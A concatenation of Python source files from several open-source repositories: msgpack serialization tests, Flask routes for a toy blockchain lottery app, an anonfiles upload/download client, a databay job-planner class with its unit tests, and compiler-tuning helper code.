name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers)
self.assertEqual(unpacked, obj)
def test_pack_force_float_precision(self):
for ((name, obj, data), precision) in zip(float_precision_test_vectors, ["single", "double"]):
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, force_float_precision=precision)
self.assertEqual(packed, data)
def test_pack_naive_timestamp(self):
for (name, obj, data, _) in naive_timestamp_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj)
self.assertEqual(packed, data)
def test_unpack_naive_timestamp(self):
for (name, _, data, obj) in naive_timestamp_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
self.assertEqual(unpacked, obj)
def test_pack_ext_override(self):
# Test overridden packing of datetime.datetime
(name, obj, data) = override_ext_handlers_test_vectors[0]
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, ext_handlers=override_ext_handlers)
self.assertEqual(packed, data)
def test_unpack_ext_override(self):
# Test overridden unpacking of Ext type -1
(name, obj, data) = override_ext_handlers_test_vectors[1]
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data, ext_handlers=override_ext_handlers)
self.assertEqual(unpacked, obj)
def test_ext_handlers_subclass(self):
class Rectangle:
def __init__(self, length, width):
self.length = length
self.width = width
def __eq__(self, other):
return self.length == other.length and self.width == other.width
class Square(Rectangle):
def __init__(self, width):
Rectangle.__init__(self, width, width)
# Test pack (packs base class)
packed = umsgpack.packb(Square(5), ext_handlers={
Rectangle: lambda obj: umsgpack.Ext(0x10, umsgpack.packb([obj.length, obj.width])),
})
self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05")
# Test unpack (unpacks base class)
unpacked = umsgpack.unpackb(packed, ext_handlers={
0x10: lambda ext: Rectangle(*umsgpack.unpackb(ext.data)),
})
self.assertEqual(unpacked, Rectangle(5, 5))
def test_ext_serializable(self):
# Register test class
@umsgpack.ext_serializable(0x20)
class CustomComplex:
def __init__(self, real, imag):
self.real = real
self.imag = imag
def __eq__(self, other):
return self.real == other.real and self.imag == other.imag
def packb(self):
return struct.pack("<II", self.real, self.imag)
@classmethod
def unpackb(cls, data):
return cls(*struct.unpack("<II", data))
obj, data = CustomComplex(123, 456), b"\xd7\x20\x7b\x00\x00\x00\xc8\x01\x00\x00"
# Test pack
packed = umsgpack.packb(obj)
self.assertEqual(packed, data)
# Test unpack
unpacked = umsgpack.unpackb(packed)
self.assertTrue(isinstance(unpacked, CustomComplex))
self.assertEqual(unpacked, obj)
_, obj, data = ext_handlers_test_vectors[0]
# Test pack priority of ext_handlers over ext_serializable()
packed = umsgpack.packb(obj, ext_handlers=ext_handlers)
self.assertEqual(packed, data)
# Test unpack priority of ext_handlers over ext_serializable()
unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers)
self.assertTrue(isinstance(unpacked, complex))
self.assertEqual(unpacked, obj)
# Test registration collision
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(0x20)
class DummyClass:
pass
# Test out of range Ext type value
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(-129)
class DummyClass2:
pass
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(128)
class DummyClass3:
pass
# Register class with missing packb() and unpackb()
@umsgpack.ext_serializable(0x21)
class IncompleteClass:
pass
# Test unimplemented packb()
with self.assertRaises(NotImplementedError):
umsgpack.packb(IncompleteClass())
# Test unimplemented unpackb()
with self.assertRaises(NotImplementedError):
umsgpack.unpackb(b"\xd4\x21\x00")
# Unregister Ext serializable classes to prevent interference with
# subsequent tests
umsgpack._ext_classes_to_code = {}
umsgpack._ext_code_to_classes = {}
def test_ext_serializable_subclass(self):
@umsgpack.ext_serializable(0x10)
class Rectangle:
def __init__(self, length, width):
self.length = length
self.width = width
def __eq__(self, other):
return self.length == other.length and self.width == other.width
def packb(self):
return umsgpack.packb([self.length, self.width])
@classmethod
def unpackb(cls, data):
return cls(*umsgpack.unpackb(data))
class Square(Rectangle):
def __init__(self, width):
Rectangle.__init__(self, width, width)
# Test pack (packs base class)
packed = umsgpack.packb(Square(5))
self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05")
# Test unpack (unpacks base class)
unpacked = umsgpack.unpackb(packed)
self.assertEqual(unpacked, Rectangle(5, 5))
# Unregister Ext serializable classes to prevent interference with
# subsequent tests
umsgpack._ext_classes_to_code = {}
umsgpack._ext_code_to_classes = {}
def test_streaming_writer(self):
# Try first composite test vector
(_, obj, data) = composite_test_vectors[0]
writer = io.BytesIO()
umsgpack.pack(obj, writer)
self.assertTrue(writer.getvalue(), data)
def test_streaming_reader(self):
# Try first composite test vector
(_, obj, data) = composite_test_vectors[0]
reader = io.BytesIO(data)
self.assertEqual(umsgpack.unpack(reader), obj)
def test_namespacing(self):
# Get a list of global variables from umsgpack module
exported_vars = list([x for x in dir(umsgpack) if not x.startswith("_")])
# Ignore imports
exported_vars = list([x for x in exported_vars if x != "struct" and x != "collections" and x != "datetime" and x !=
"sys" and x != "io" and x != "xrange" and x != "Hashable"])
self.assertTrue(len(exported_vars) == len(exported_vars_test_vector))
for var in exported_vars_test_vector:
self.assertTrue(var in exported_vars)
def test_load_short_read(self):
# When reading from files, the network, etc. there's no guarantee that
# read(n) returns n bytes. Simulate this with a file-like object that
# returns 1 byte at a time.
class SlowFile(object):
def __init__(self, data):
self._data = data
def read(self, n=None):
if n is None or len(self._data) == 0:
data, self._data = self._data, b''
return data
chunk = self._data[0:1]
self._data = self._data[1:]
return chunk
obj = {'hello': 'world'}
f = SlowFile(umsgpack.dumps(obj))
unpacked = umsgpack.load(f)
self.assertEqual(unpacked, obj)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "00MB/lottocoin",
"score": 3
} |
#### File: lottocoin/lottocoin/routes.py
```python
from lottocoin.models import User
from lottocoin.forms import *
from flask import Flask, jsonify, request, render_template, url_for, flash, redirect
from lottocoin import app, db, bcrypt
from lottocoin import blockchainObj
from flask_login import login_user, current_user, logout_user, login_required
from Crypto.PublicKey import RSA
from expiringdict import ExpiringDict
import requests
#FLASK ROUTES
current_sessions = ExpiringDict(max_len=500, max_age_seconds=500)
@app.route("/")
@app.route("/home")
@app.route("/blockchain")
def home():
blockchainObj.resolveConflicts();
return render_template('blockchain.html', title = "Blockchain", blockchain = blockchainObj);
@app.route("/transaction", methods=['GET', 'POST'])
def transaction():
form = TransactionForm();
formNL = TransactionFormNotLoggedIn();
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print("hi");
if form.validate_on_submit():
print("hi");
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print(type(form.key.data));
if form.amount.data > blockchainObj.getBalance(form.sender.data):
return render_template('error.html', title = "Error", error="You do not have enough coins to make this transaction.")
feedback = blockchainObj.addTransaction(form.sender.data, form.reciever.data, form.amount.data, form.key.data, form.key.data);
if feedback:
flash(f'Transaction Made!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL);
if formNL.validate_on_submit():
return redirect(url_for('login'));
return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL);
@app.route("/minerPage")
def minerPage():
return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj);
@app.route("/purchase", methods=['GET', 'POST'])
def purchase():
form = TransactionForm();
formNL = TransactionFormNotLoggedIn();
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print("hi");
if form.validate_on_submit():
print("hi");
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print(type(form.key.data));
feedback = blockchainObj.addTransaction(form.sender.data, form.reciever.data, form.amount.data, form.key.data, form.key.data);
if feedback:
flash(f'Transaction Made!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('purchase.html', title = "Purchase", blockchain = blockchainObj, form=form, formNL= formNL);
@app.route("/register", methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
#password hashing
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8');
keyGen = blockchainObj.generateKeys();
user = User(name=form.name.data, username=form.username.data, email=form.email.data, password=<PASSWORD>, key = keyGen);
db.session.add(user);
db.session.commit();
login_user(user);
nextPage = request.args.get('next');
flash(f'Account created for @{form.username.data}! You are now logged in as well.', 'success')
return redirect(nextPage) if nextPage else redirect(url_for('home'));
return render_template('register.html', form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first();
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data);
nextPage = request.args.get('next');
flash(f'Welcome! You are now logged in', 'success');
global current_sessions
current_sessions[user.username] = current_user
print(current_sessions)
return redirect(nextPage) if nextPage else redirect(url_for('home'));
else:
flash('Login Unsuccessful. Please check email and password', 'danger');
#return redirect(url_for('login'))
return render_template('login.html', form=form);
@app.route("/logout")
def logout():
global current_sessions
current_sessions.pop(current_user.get_id())
logout_user();
return redirect(url_for('home'));
@app.route("/account")
@login_required
def account():
return render_template('account.html', title='Account', blockchain = blockchainObj)
#BLOCKCHAIN BACKEND REQUESTS
@app.route('/mine', methods=['GET'])
def mine():
print("madeit");
miner = request.args.get('miner', None);
lastBlock = blockchainObj.getLastBlock();
if len(blockchainObj.pendingTransactions) <= 1:
flash(f'Not enough pending transactions to mine! (Must be > 1)', 'danger');
else:
feedback = blockchainObj.minePendingTransactions(miner);
if feedback:
flash(f'Block Mined! You have a ticket for the lottery now!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj);
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
values = request.get_json();
required = ['sender', 'reciever', 'amt']
if not all(k in values for k in required):
return 'Missing values', 400;
index = blockchainObj.addTransaction(values['sender'], values['reciever'], values['amt'])
response = {'message': f'Transaction will be added to Block {index}'}
return jsonify(response), 201;
@app.route('/chain', methods=['GET'])
def full_chain():
response = {
'chain': blockchainObj.chainJSONencode(),
'length': len(blockchainObj.chain),
}
return jsonify(response), 200
#blockchainObj DECENTRALIZED NODES
@app.route('/nodes/register', methods=['POST'])
def register_nodes():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
for node in nodes:
blockchainObj.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchainObj.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchainObj.resolveConflicts()
if replaced:
response = {
'message': 'Our chain was replaced',
'new_chain': blockchainObj.chainJSONencode()
}
else:
response = {
'message': 'Our chain is authoritative',
'chain': blockchainObj.chainJSONencode()
}
return jsonify(response), 200
@app.route('/lottery')
def lottery():
return render_template('lottery.html', title='Lottery', blockchain = blockchainObj)
@app.route('/users')
def users():
all_usernames = []
all_users = User.query.all()
for x in range(len(all_users)):
all_usernames.append(all_users[x].username)
print(all_usernames)
return render_template('users.html', users=current_sessions, allusers=all_usernames)
``` |
{
"source": "00mjk/anonfile-api",
"score": 2
} |
#### File: src/anonfile/anonfile.py
```python
from __future__ import annotations
import html
import os
import re
import sys
from dataclasses import dataclass
from functools import wraps
from pathlib import Path
from typing import List, Tuple
from urllib.parse import ParseResult, urljoin, urlparse
from urllib.request import getproxies
import requests
from faker import Faker
from requests import Session
from requests.adapters import HTTPAdapter
from requests.models import Response
from tqdm import tqdm
from tqdm.utils import CallbackIOWrapper
from urllib3 import Retry
__version__ = "0.2.4"
package_name = "anonfile"
python_major = "3"
python_minor = "7"
try:
assert sys.version_info >= (int(python_major), int(python_minor))
except AssertionError:
raise RuntimeError(f"{package_name!r} requires Python {python_major}.{python_minor}+ (You have Python {sys.version})")
@dataclass(frozen=True)
class ParseResponse:
response: Response
file_path: Path
@property
def json(self) -> dict:
"""
Return the entire HTTP response.
"""
return self.response.json()
@property
def status(self) -> bool:
"""
Return the upload status. If `false`, an error message indicating the
cause for the malfunction will be redirected to `sys.stderr`.
"""
status = bool(self.json['status'])
if not status:
print(self.json['error']['message'], file=sys.stderr)
print(self.json['error']['type'], file=sys.stderr)
print(self.json['error']['code'], file=sys.stderr)
return status
@property
def url(self) -> ParseResult:
"""
Return the URL associated with the uploaded file.
```
"""
return urlparse(self.json['data']['file']['url']['full'])
#region metadata
@property
def id(self) -> str:
"""
Return the ID (path) of the uploaded file.
"""
return self.json['data']['file']['metadata']['id']
@property
def name(self) -> Path:
"""
Return the filename of the uploaded file.
"""
return Path(self.json['data']['file']['metadata']['name'])
@property
def size(self) -> int:
"""
Return the uploaded file size in bytes.
"""
return int(self.json['data']['file']['metadata']['size']['bytes'])
#endregion
class AnonFile:
_timeout = (5, 5)
_total = 5
_status_forcelist = [413, 429, 500, 502, 503, 504]
_backoff_factor = 1
_fake = Faker()
API = "https://api.anonfiles.com/"
__slots__ = ['endpoint', 'token', 'timeout', 'total', 'status_forcelist', 'backoff_factor']
def __init__(self,
token: str="",
timeout: Tuple[float,float]=_timeout,
total: int=_total,
status_forcelist: List[int]=_status_forcelist,
backoff_factor: int=_backoff_factor) -> AnonFile:
self.token = token
self.timeout = timeout
self.total = total,
self.status_forcelist = status_forcelist,
self.backoff_factor = backoff_factor
@staticmethod
def __progressbar_options(iterable, desc, unit, color: str="\033[32m", char='\u25CB', total=None, disable=False) -> dict:
"""
Return custom optional arguments for `tqdm` progressbars.
"""
return {
'iterable': iterable,
'bar_format': "{l_bar}%s{bar}%s{r_bar}" % (color, "\033[0m"),
'ascii': char.rjust(9, ' '),
'desc': desc,
'unit': unit.rjust(1, ' '),
'unit_scale': True,
'unit_divisor': 1024,
'total': len(iterable) if total is None else total,
'disable': not disable
}
@property
def retry_strategy(self) -> Retry:
"""
The retry strategy returns the retry configuration made up of the
number of total retries, the status forcelist as well as the backoff
factor. It is used in the session property where these values are
passed to the HTTPAdapter.
"""
return Retry(total=self.total,
status_forcelist=self.status_forcelist,
backoff_factor=self.backoff_factor
)
@property
def session(self) -> Session:
"""
Create a custom session object. A request session provides cookie
persistence, connection-pooling, and further configuration options.
"""
assert_status_hook = lambda response, *args, **kwargs: response.raise_for_status()
session = requests.Session()
session.mount("https://", HTTPAdapter(max_retries=self.retry_strategy))
session.hooks['response'] = [assert_status_hook]
session.headers.update({
"User-Agent" : AnonFile._fake.chrome(version_from=80, version_to=86, build_from=4100, build_to=4200)
})
return session
def authenticated(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
if self.token is not None:
return func(self, *args, **kwargs)
else:
raise Exception("[!] Error: API key is not configured.")
except Exception as exception:
print(exception, file=sys.stderr)
return wrapper
@authenticated
def upload(self, path: str, progressbar: bool=False) -> ParseResponse:
"""
Upload a file located in `path` to http://anonfiles.com.
Example
-------
```
from anonfile import AnonFile
anon = AnonFile('my_token')
result = anon.upload('test.txt')
# https://anonfiles.com/9ee1jcu6u9/test_txt
print(result.url.geturl())
```
Note
----
- `AnonFile` offers unlimited bandwidth
- Uploads cannot exceed a file size of 20G
"""
size = os.stat(path).st_size
options = AnonFile.__progressbar_options(None, f"Upload: {Path(path).name}", unit='B', total=size, disable=progressbar)
with open(path, mode='rb') as file_handler:
with tqdm(**options) as tqdm_handler:
response = self.session.post(
urljoin(AnonFile.API, 'upload'),
params={'token': self.token},
files={'file': CallbackIOWrapper(tqdm_handler.update, file_handler, 'read')},
timeout=self.timeout,
proxies=getproxies(),
verify=True
)
return ParseResponse(response, Path(path))
@authenticated
def download(self, url: str, path: Path=Path.cwd(), progressbar: bool=False) -> ParseResponse:
"""
Download a file from https://anonfiles.com given a `url`. Set the download
directory in `path` (uses the current working directory by default).
Example
-------
```
from pathlib import Path
from anonfile import AnonFile
anon = AnonFile('my_token')
target_dir = Path.home().joinpath('Downloads')
result = anon.download("https://anonfiles.com/9ee1jcu6u9/test_txt", target_dir)
# WindowsPath('C:/Users/username/Downloads/test.txt')
print(result.file_path)
```
"""
get = lambda url, **kwargs: self.session.get(url, timeout=self.timeout, proxies=getproxies(), **kwargs)
info = get(urljoin(AnonFile.API, f"v2/file/{urlparse(url).path.split('/')[1]}/info"))
info.encoding = 'utf-8'
links = re.findall(r'''.*?href=['"](.*?)['"].*?''', html.unescape(get(url).text), re.I)
download_link = next(filter(lambda link: 'cdn-' in link, links))
file_path = path.joinpath(Path(urlparse(download_link).path).name)
download = ParseResponse(info, file_path)
options = AnonFile.__progressbar_options(None, f"Download {download.id}", unit='B', total=download.size, disable=progressbar)
with open(file_path, mode='wb') as file_handler:
with tqdm(**options) as tqdm_handler:
for chunk in get(download_link, stream=True).iter_content(1024):
tqdm_handler.update(len(chunk))
file_handler.write(chunk)
return download
``` |
{
"source": "00mjk/databay",
"score": 3
} |
#### File: databay/databay/base_planner.py
```python
import logging
from abc import ABC, abstractmethod
from typing import List, Union
from databay.errors import MissingLinkError
from databay.link import Link
_LOGGER = logging.getLogger('databay.BasePlanner')
class BasePlanner(ABC):
"""
Base abstract class for a job planner. Implementations should handle scheduling link transfers based on :py:class:`datetime.timedelta` intervals.
"""
def __init__(self, links: Union[Link, List[Link]] = None):
"""
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be added and scheduled.
"""
self._links = []
if links is not None:
self.add_links(links)
@property
def links(self):
"""
Links currently handled by this planner.
:return: list[:any:`Link`]
"""
return self._links
def add_links(self, links: Union[Link, List[Link]]):
"""
Add new links to this planner. This can be run once planner is already running.
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be added and scheduled.
"""
if not isinstance(links, list):
links = [links]
for link in links:
assert isinstance(link, Link)
self._links.append(link)
self._schedule(link)
_LOGGER.info('Added link: %s', link)
def remove_links(self, links: Link):
"""
Remove links from this planner. This can be run once planner is already running.
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be unscheduled and removed.
:raises: :py:class:`MissingLinkError <errors.MissingLinkError>` if link is not found.
"""
if not isinstance(links, list):
links = [links]
for link in links:
if link not in self._links:
raise MissingLinkError(
f'Planner does not contain the link: {link}')
if link.job is not None:
self._unschedule(link)
self._links.remove(link)
@abstractmethod
def _schedule(self, link: Link):
"""
Schedule a link. Note that links expect to be given a job upon scheduling by calling :py:func:`Link.set_job <databay.link.Link.set_job>` method.
Override this method to provide scheduling logic.
:type link: :any:`Link`
:param link: Link to be scheduled
"""
raise NotImplementedError()
@abstractmethod
def _unschedule(self, link: Link):
"""
Unschedule a link.
Override this method to provide unscheduling logic.
:type link: :any:`Link`
:param link: Link to be unscheduled
"""
raise NotImplementedError()
def start(self):
"""
Start this planner. Links will start being scheduled based on their intervals after calling this method. The exact methodology depends on the planner implementation used.
This will also loop over all links and call the on_start callback before starting the planner.
See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown.
"""
_LOGGER.info('Starting %s' % str(self))
for link in self.links:
link.on_start()
self._start_planner()
def shutdown(self, wait: bool = True):
"""
Shutdown this planner. Links will stop being scheduled after calling this method. Remaining link jobs may still execute after calling this method depending on the concrete planner implementation.
This will also loop over all links and call the on_shutdown callback after shutting down the planner.
See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown.
"""
_LOGGER.info('Shutting down %s' % str(self))
self._shutdown_planner(wait)
for link in self.links:
link.on_shutdown()
@abstractmethod
def _start_planner(self):
"""
Override this method to provide starting functionality.
"""
raise NotImplementedError()
@abstractmethod
def _shutdown_planner(self, wait: bool = True):
"""
Override this method to provide shutdown functionality.
"""
raise NotImplementedError()
def purge(self):
"""
Unschedule and clear all links. It can be used while planner is running.
"""
for link in self.links:
self._unschedule(link)
self._links = []
@property
@abstractmethod
def running(self):
"""
Whether this planner is currently running.
Override this property to indicate when the underlying scheduling functionality is currently running.
"""
raise NotImplementedError()
```
#### File: test/unit/test_base_planner.py
```python
import logging
from datetime import timedelta
from unittest import TestCase, mock
from unittest.mock import patch, MagicMock
import databay
from databay import BasePlanner, Link
from databay.errors import MissingLinkError
from test_utils import fqname
class TestBasePlanner(TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
logging.getLogger('databay').setLevel(logging.WARNING)
@patch.multiple(BasePlanner, __abstractmethods__=set())
def setUp(self):
self.planner = BasePlanner()
self.planner._schedule = MagicMock(
side_effect=lambda link: link.set_job(object()))
self.planner._unschedule = MagicMock(
side_effect=lambda link: link.set_job(None))
self.planner._start_planner = MagicMock()
self.planner._shutdown_planner = MagicMock()
@patch(fqname(Link), spec=Link)
def test_add_links(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links(link)
self.assertIsNotNone(link.job, 'Link should contain a job')
self.assertTrue(link in self.planner.links,
'Planner should contain the link')
@patch(fqname(Link), spec=Link)
def test_add_links_array(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links([link])
self.assertIsNotNone(link.job, 'Link should contain a job')
self.assertTrue(link in self.planner.links,
'Planner should contain the link')
@patch(fqname(Link), spec=Link)
def test_remove_links(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links(link)
self.planner.remove_links(link)
self.assertIsNone(link.job, 'Link should not contain a job')
self.assertTrue(link not in self.planner.links,
'Planner should not contain the link')
@patch(fqname(Link), spec=Link)
def test_remove_invalid_link(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.assertRaises(MissingLinkError, self.planner.remove_links, link)
self.assertIsNone(link.job, 'Link should not contain a job')
self.assertTrue(link not in self.planner.links,
'Planner should not contain the link')
@patch(fqname(Link), spec=Link)
def test_start(self, link):
self.planner.add_links(link)
self.planner.start()
link.on_start.assert_called()
self.planner._start_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_shutdown(self, link):
self.planner.add_links(link)
self.planner.shutdown()
link.on_shutdown.assert_called()
self.planner._shutdown_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_start_order(self, link):
# on_start should be called before _start_planner
link.on_start.side_effect = lambda: self.planner._start_planner.assert_not_called()
self.planner.add_links(link)
self.planner.start()
# finally both should be called
link.on_start.assert_called()
self.planner._start_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_shutdown_order(self, link):
# on_shutdown should be called after _shutdown_planner
self.planner._shutdown_planner.side_effect = lambda wait: link.on_shutdown.assert_not_called()
self.planner.add_links(link)
self.planner.shutdown()
# finally both should be called
link.on_shutdown.assert_called()
self.planner._shutdown_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_purge(self, link):
self.planner.add_links(link)
self.planner.purge()
self.planner._unschedule.assert_called_with(link)
self.assertEqual(self.planner.links, [])
@patch(fqname(Link), spec=Link)
def test_purge_while_running(self, link):
self.planner.add_links(link)
self.planner.start()
self.planner.purge()
self.planner._unschedule.assert_called_with(link)
self.assertEqual(self.planner.links, [])
self.planner.shutdown()
``` |
{
"source": "00mjk/iree-llvm-sandbox",
"score": 3
} |
#### File: examples/core/nevergrad_tuner_utils.py
```python
import typing as tp
from argparse import ArgumentParser
import numpy as np
from typing import Callable, Sequence
import mlir.ir as ir
debug_constraints = False
def save_module(module, module_save_filename):
"""Helper function to save a module to a file."""
with open(module_save_filename, 'w') as f:
f.write(str(module))
print(f'Module saved in {module_save_filename}')
class NGSchedulerInterface:
"""Generic interface for schedule search via nevergrad."""
def build_compile_time_problem_sizes(self):
"""Build the dictionary of (dimension_name, size) giving the sizes to compile"""
pass
def create_matchers(self, module, benefit: int = 1):
"""Create the PDL matchers
Create the PDL IR for matchers / constraints inside `module`.
"""
pass
def schedule(self, module, proposal, benefit: int = 1):
"""Create the PDL matchers
Create the PDL IR for schedule inside `module`.
"""
pass
def save_proposal_as_module(self,
proposal,
module_save_filename,
benefit: int = 1):
with ir.Context() as ctx, ir.Location.unknown() as loc:
module = ir.Module.create()
self.schedule(module, proposal, benefit)
save_module(module, module_save_filename)
with open(module_save_filename, 'w') as f:
f.write(str(module))
################################################################################
### Nevergrad constraints.
### TODO: somehow connect to PDL matchers.
################################################################################
def constraint_all_must_divide(problem_sizes: Sequence[int],
search_sizes: Sequence[int]):
"""Constraint to specify `search_sizes` are either 0 or divide `problem_sizes`."""
if debug_constraints:
print(f'C1 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
for size, search_size in zip(problem_sizes, search_sizes):
if search_size != 0 and size % search_size != 0:
return False
return True
def constraint_unrolling_not_too_big(problem_sizes: Sequence[int],
search_sizes: Sequence[int],
unrolling_limit: int):
"""Constraint to specify `search_sizes` do not yield too much unrolling."""
if debug_constraints:
print(f'C2 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
prod = 1
for size, search_size in zip(problem_sizes, search_sizes):
prod = prod * size if search_size == 0 else prod * search_size
if debug_constraints:
print(f'C2 prod {prod}')
return prod < unrolling_limit
def constraint_in_bounds(problem_sizes: Sequence[int],
search_sizes: Sequence[int]):
"""Constraint to limit `search_sizes` to the extent of the problem_sizes."""
if debug_constraints:
print(f'C3 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
for size, search_size in zip(problem_sizes, search_sizes):
if search_size > size:
return False
return True
def constraint_volume_not_too_small(
problem_sizes: Sequence[int], search_sizes: Sequence[int],
volume_limit: int, volume_relative_percentage_lower_bound: int):
"""Constraint to skip `search_sizes` that would yield a too small volume."""
if debug_constraints:
print(f'C4 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
size_prod = np.prod(problem_sizes)
search_size_prod = 1
for size, search_size in zip(problem_sizes, search_sizes):
search_size_prod = search_size_prod * size \
if search_size == 0 else search_size_prod * search_size
return search_size_prod >= volume_limit or \
100 * search_size_prod + 1 > volume_relative_percentage_lower_bound * size_prod
def size_constraints_conjunction_satisfied(
problem_sizes: Sequence[int],
search_sizes: Sequence[int],
unrolling_limit: int = 10000,
volume_limit: int = 16,
volume_relative_percentage_lower_bound: int = 25):
"""Constraint to perform the conjunction of known constraints."""
return constraint_unrolling_not_too_big(problem_sizes, \
search_sizes, \
unrolling_limit) \
and constraint_volume_not_too_small(problem_sizes, \
search_sizes, \
volume_limit, \
volume_relative_percentage_lower_bound) \
and constraint_in_bounds(problem_sizes, search_sizes)
# A `proposal` coming from Nevergrad contains a tuple of (*args, **kwargs)
# we want to extract the search sizes and we need to unwrap the np.array to
# a list.
def dispatch_size_constraints_conjunction_satisfied(
problem_sizes: Sequence[int], proposal, keyword):
# Unwrap the np.array
proposed_search_sizes = [x for x in proposal[1][keyword]]
return size_constraints_conjunction_satisfied(problem_sizes,
proposed_search_sizes)
################################################################################
### Argparser
################################################################################
def add_argparser_tuning_arguments(parser: ArgumentParser):
"""Add tuning-specific arguments to the parser."""
parser.add_argument('--machine-peak', type=int, nargs='?', default=192)
parser.add_argument('--metric-to-measure',
type=str,
nargs='?',
default='gflop_per_s_per_iter')
parser.add_argument(
'--output-dir',
type=str,
nargs='?',
)
parser.add_argument('--num-parallel-tasks', type=int, nargs='?', default=1)
parser.add_argument('--num-cpus-per-benchmark',
type=int,
nargs='?',
default=1)
parser.add_argument('--random-seed', type=int, nargs='?', default=42)
parser.add_argument('--search-budget', type=int, nargs='?', default=100)
parser.add_argument(
'--search-strategy',
type=str,
nargs='?',
default='RandomSearch',
)
parser.add_argument('--timeout-per-compilation',
type=float,
nargs='?',
default=5)
# Until ExecutionEngine pickles, we are both compiling and evaluating.
parser.add_argument('--timeout-per-benchmark',
type=float,
nargs='?',
default=1)
```
#### File: examples/fusion/definitions.py
```python
import os, sys, time
from typing import Any, List, Mapping, Optional, Sequence
import numpy as np
from mlir.ir import *
from mlir.dialects import arith, builtin, linalg, tensor, scf, func
from mlir.dialects.linalg.opdsl.lang import *
from ..core.compilation import attach_inplaceable_attributes, attach_passthrough
from ..core.problem_definition import *
from ..core.utils import *
# TODO: Orthogonal configuration object.
avx512 = True
################################################################################
### Matmul
################################################################################
# Op def: ( m, n, k )
# Iters: ({Par(), Par(), Red()})
# A B C
# Layout: {{m, k}, {k, n}, {m, n}}
class MatmulProblem(ProblemDefinition):
""" Problem definition for a single fill + matmul problem."""
def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]:
"""Shape builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the list of lists of shapes of the FuncOp operands. The
FuncOp is responsible for distinguishing between input operands and results.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return [[M, K], [K, N], [M, N]]
def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float:
"""GFlop builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the number of GFlops computed.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return float(2.0 * M * N * K) / float(1e9)
def gbyte_count_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> float:
"""GByte builder function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of data types, return the number of GBytes read or
written.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
lhs_np_type, rhs_np_type, acc_np_type = types
return float(M * N * np.dtype(lhs_np_type).itemsize +
M * K * np.dtype(rhs_np_type).itemsize +
K * N * np.dtype(acc_np_type).itemsize) / float(1e9)
